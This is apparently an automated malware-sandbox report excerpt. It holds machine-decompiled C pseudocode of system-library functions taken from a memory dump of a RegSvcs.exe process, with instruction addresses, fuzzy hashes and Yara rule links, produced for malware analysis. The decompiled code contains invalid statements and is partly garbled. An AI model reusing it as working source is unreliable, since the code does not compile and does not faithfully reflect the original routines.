				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0xb3d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E00A8D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E00A62280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L00A64620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E00A8F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E00A5FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0xb3b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E00A8B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}

0x00a75142
0x00a7514c
0x00a75150
0x00a75157
0x00a75159
0x00a7515e
0x00a75165
0x00a75169
0x00a7516c
0x00a75172
0x00a75176
0x00a7517a
0x00a7517a
0x00a7517a
0x00a7517f
0x00ab6d8b
0x00ab6d8e
0x00ab6d91
0x00ab6d95
0x00ab6d98
0x00ab6d9c
0x00ab6da0
0x00ab6da3
0x00ab6da7
0x00ab6e26
0x00ab6e26
0x00ab6e2a
0x00a751f9
0x00a751f9
0x00a751fe
0x00ab6e33
0x00ab6e33
0x00ab6e39
0x00ab6e3d
0x00ab6e46
0x00ab6e50
0x00000000
0x00000000
0x00ab6e52
0x00ab6e53
0x00ab6e56
0x00ab6e5d
0x00000000
0x00000000
0x00000000
0x00ab6e5f
0x00ab6e67
0x00ab6e77
0x00ab6e7f
0x00ab6e80
0x00ab6e88
0x00ab6e90
0x00ab6e9f
0x00ab6ea5
0x00ab6ea9
0x00ab6eb1
0x00ab6ebf
0x00000000
0x00000000
0x00ab6ecf
0x00ab6ed3
0x00000000
0x00000000
0x00ab6edb
0x00ab6ede
0x00ab6ee1
0x00ab6ee8
0x00ab6eeb
0x00ab6eed
0x00ab6ef0
0x00ab6ef4
0x00ab6ef8
0x00ab6efc
0x00000000
0x00000000
0x00ab6f0d
0x00ab6f11
0x00ab6f32
0x00ab6f37
0x00ab6f3b
0x00ab6f3e
0x00ab6f41
0x00ab6f46
0x00000000
0x00000000
0x00ab6f4c
0x00ab6f50
0x00ab6f50
0x00ab6f54
0x00ab6f62
0x00ab6f65
0x00ab6f6d
0x00ab6f7b
0x00ab6f7b
0x00ab6f93
0x00ab6f98
0x00ab6fa0
0x00ab6fa6
0x00ab6fb3
0x00ab6fb6
0x00ab6fbf
0x00ab6fc1
0x00ab6fd5
0x00ab6fda
0x00ab6fda
0x00ab6fdd
0x00ab6fe2
0x00ab6fe7
0x00ab6feb
0x00ab6fef
0x00ab6ff3
0x00a7520c
0x00a7520c
0x00a7520f
0x00a75215
0x00a75234
0x00a7523a
0x00a7523a
0x00a75244
0x00a75245
0x00a75246
0x00a75251
0x00a75251
0x00ab6f13
0x00ab6f17
0x00ab6f17
0x00ab6f18
0x00ab6f1b
0x00ab6f1f
0x00ab6f23
0x00000000
0x00ab6f28
0x00a75204
0x00a75204
0x00a75208
0x00000000
0x00a75208
0x00a75185
0x00a75188
0x00a7518a
0x00a7518e
0x00a75195
0x00ab6db1
0x00ab6db5
0x00ab6db9
0x00a7519b
0x00a7519b
0x00a7519e
0x00a751a7
0x00a751a9
0x00a751a9
0x00a751b5
0x00a751b8
0x00a751bb
0x00a751be
0x00a751c1
0x00a751c5
0x00a751c9
0x00a751cd
0x00a751cd
0x00a751d8
0x00a751dc
0x00a751e0
0x00ab6dcc
0x00ab6dd0
0x00ab6dd5
0x00ab6ddd
0x00ab6de1
0x00ab6de1
0x00ab6de5
0x00ab6deb
0x00ab6df1
0x00ab6df7
0x00ab6dfd
0x00ab6e01
0x00ab6e05
0x00ab6e09
0x00ab6e0d
0x00ab6e11
0x00ab6e11
0x00a751eb
0x00ab6e1a
0x00ab6e1f
0x00ab6e21
0x00ab6e23
0x00000000
0x00a751f1
0x00a751f1
0x00000000
0x00a751f1

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce69f18b38c4304d3051dd0170a7f549d593813593ec418fe1cddcc85371b19
Instruction ID: 0a1b003297374412548743da82b999ab681b86b8c31f845993a8479c076bbf1e
Opcode Fuzzy Hash: dce69f18b38c4304d3051dd0170a7f549d593813593ec418fe1cddcc85371b19
Instruction Fuzzy Hash: E1C125755097808FD354CF28C580AAAFBF1BF88304F148A6EF8998B352D775E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00A703E2 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00A703E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0xb3d360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E00A70548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E00A8B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E00A5B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0xb37c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E00A67D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E00A67D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E00AC7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E00A89830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E00AC69A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0xb37c04 != 0) {
						_t118 = _v12;
						_t120 = E00ACA7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0xb37bd8;
						if( *0xb37bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E00A895D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E00A899A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E00AC3540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E00A4B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E00A8AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0xb38474 - 3;
										if( *0xb38474 != 3) {
											 *0xb379dc =  *0xb379dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E00A67D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E00A67D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E00AC7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0xb38708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0xb37b00; // 0x0
							asm("ror esi, cl");
							 *0xb3b1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E00A895D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E00A57F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}

0x00a703f1
0x00a703f7
0x00a703f9
0x00a703fb
0x00a703fd
0x00a70400
0x00a7040a
0x00ab4c7a
0x00a70537
0x00a70547
0x00a70410
0x00a70410
0x00a70414
0x00a70417
0x00a7041a
0x00a70421
0x00a70424
0x00a7042b
0x00a7043b
0x00a7043e
0x00a7043f
0x00a7043f
0x00a70446
0x00a70449
0x00a7044c
0x00a7044f
0x00a70459
0x00ab4c8d
0x00a7045f
0x00a7045f
0x00a7045f
0x00a70467
0x00ab4c97
0x00ab4c9d
0x00ab4ca4
0x00ab4caa
0x00ab4caf
0x00ab4cb1
0x00ab4cc3
0x00ab4cb3
0x00ab4cbc
0x00ab4cbc
0x00ab4cc8
0x00ab4ccb
0x00ab4cd7
0x00ab4cda
0x00ab4cdf
0x00ab4cdf
0x00ab4ccb
0x00ab4ca4
0x00a7046d
0x00a7046f
0x00a7046f
0x00a70471
0x00a70476
0x00a7047a
0x00a7047b
0x00a70483
0x00a70489
0x00a7048d
0x00000000
0x00000000
0x00ab4ce9
0x00ab4cef
0x00ab4d22
0x00ab4d22
0x00000000
0x00ab4d22
0x00ab4cf1
0x00ab4cf7
0x00000000
0x00000000
0x00ab4cf9
0x00ab4cff
0x00000000
0x00000000
0x00ab4d05
0x00ab4d07
0x00000000
0x00000000
0x00ab4d0d
0x00ab4d0f
0x00ab4d14
0x00ab4d16
0x00000000
0x00000000
0x00ab4d1c
0x00ab4d1c
0x00a70499
0x00a70535
0x00a70535
0x00000000
0x00a70535
0x00a704a6
0x00ab4d2c
0x00ab4d37
0x00ab4d39
0x00ab4d3b
0x00000000
0x00000000
0x00ab4d41
0x00ab4d48
0x00a70527
0x00a7052b
0x00a7052d
0x00a70530
0x00a70530
0x00000000
0x00a7052b
0x00ab4d4e
0x00a704ac
0x00a704ac
0x00a704af
0x00a704b2
0x00a704b7
0x00a704b9
0x00a704bb
0x00a704bd
0x00a704bf
0x00a704c5
0x00a704c9
0x00ab4d53
0x00ab4d59
0x00ab4db9
0x00ab4dba
0x00ab4dbf
0x00ab4dc2
0x00ab4dc4
0x00ab4dc7
0x00ab4dce
0x00000000
0x00ab4dce
0x00ab4d5b
0x00ab4d61
0x00000000
0x00000000
0x00ab4d63
0x00ab4d69
0x00000000
0x00000000
0x00ab4d6b
0x00ab4d6e
0x00ab4d74
0x00ab4d76
0x00ab4d7c
0x00ab4d7e
0x00ab4d84
0x00ab4d89
0x00ab4d8c
0x00ab4d8d
0x00ab4d92
0x00ab4d95
0x00ab4d96
0x00ab4d98
0x00ab4d9a
0x00ab4d9f
0x00ab4da4
0x00ab4da6
0x00ab4da8
0x00ab4daf
0x00ab4db1
0x00ab4db1
0x00ab4daf
0x00ab4da6
0x00ab4d84
0x00ab4d7c
0x00000000
0x00ab4d74
0x00a704d6
0x00ab4de1
0x00a704dc
0x00a704dc
0x00a704dc
0x00a704e4
0x00ab4deb
0x00ab4df1
0x00ab4df8
0x00ab4dfe
0x00ab4e03
0x00ab4e05
0x00ab4e17
0x00ab4e07
0x00ab4e10
0x00ab4e10
0x00ab4e1c
0x00ab4e1f
0x00ab4e35
0x00ab4e35
0x00ab4e1f
0x00ab4df8
0x00a704f1
0x00a704fa
0x00ab4e3f
0x00ab4e47
0x00ab4e5b
0x00ab4e61
0x00ab4e67
0x00ab4e69
0x00ab4e71
0x00ab4e73
0x00a70500
0x00a70500
0x00a70500
0x00a704fa
0x00a70508
0x00a7051d
0x00a7051d
0x00a7051f
0x00a70524
0x00000000
0x00a70524
0x00a70515
0x00a70517
0x00ab4e7a
0x00ab4e7c
0x00000000
0x00000000
0x00ab4e85
0x00000000
0x00ab4e85
0x00000000
0x00a70517

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9046f4d2657abc3bed22162dbb503dfdeffc9e97434d00557eec254266e0188c
Instruction ID: 28e412f2a333c0f029f3b1ec2829f23a0164f349f1c5764c6028620ba2a9a1ed
Opcode Fuzzy Hash: 9046f4d2657abc3bed22162dbb503dfdeffc9e97434d00557eec254266e0188c
Instruction Fuzzy Hash: 6F911631E04214EFEB219B68CC45FEE7BB8AB05724F158265FA15AB2D3DB749D00CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00A4C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0xb3d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E00A56D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E00A8B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0xb37b9c; // 0x0
					_t74 = L00A64620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E00A89650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L00A677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E00A8F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E00A813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L00A677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E00A89650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x00a4c608
0x00a4c615
0x00a4c625
0x00a4c62d
0x00a4c635
0x00a4c640
0x00a4c680
0x00a4c687
0x00a4c688
0x00a4c689
0x00a4c694
0x00a4c694
0x00a4c642
0x00a4c64a
0x00a4c697
0x00ab7a25
0x00ab7a2b
0x00ab7a2e
0x00ab7a30
0x00ab7bea
0x00ab7bea
0x00000000
0x00ab7bea
0x00ab7a36
0x00ab7a43
0x00ab7a48
0x00ab7a4c
0x00ab7a4e
0x00000000
0x00000000
0x00ab7a58
0x00ab7a5a
0x00ab7a5b
0x00ab7a5c
0x00ab7a5d
0x00ab7a63
0x00ab7a64
0x00ab7a6a
0x00ab7a6c
0x00ab7a6e
0x00ab79cb
0x00ab79cb
0x00ab79ce
0x00ab79d0
0x00ab7a98
0x00ab7a9b
0x00ab7a9b
0x00ab7a9e
0x00ab7aa1
0x00ab7bbe
0x00ab7bbe
0x00ab7bc0
0x00ab7be0
0x00ab7be0
0x00ab7a01
0x00ab7a01
0x00ab7a05
0x00ab7a07
0x00ab7a15
0x00ab7a15
0x00ab7a1a
0x00000000
0x00ab7a1a
0x00ab7bc2
0x00ab7bc6
0x00ab7bc9
0x00ab7bcd
0x00ab7bcf
0x00ab79e6
0x00ab79e6
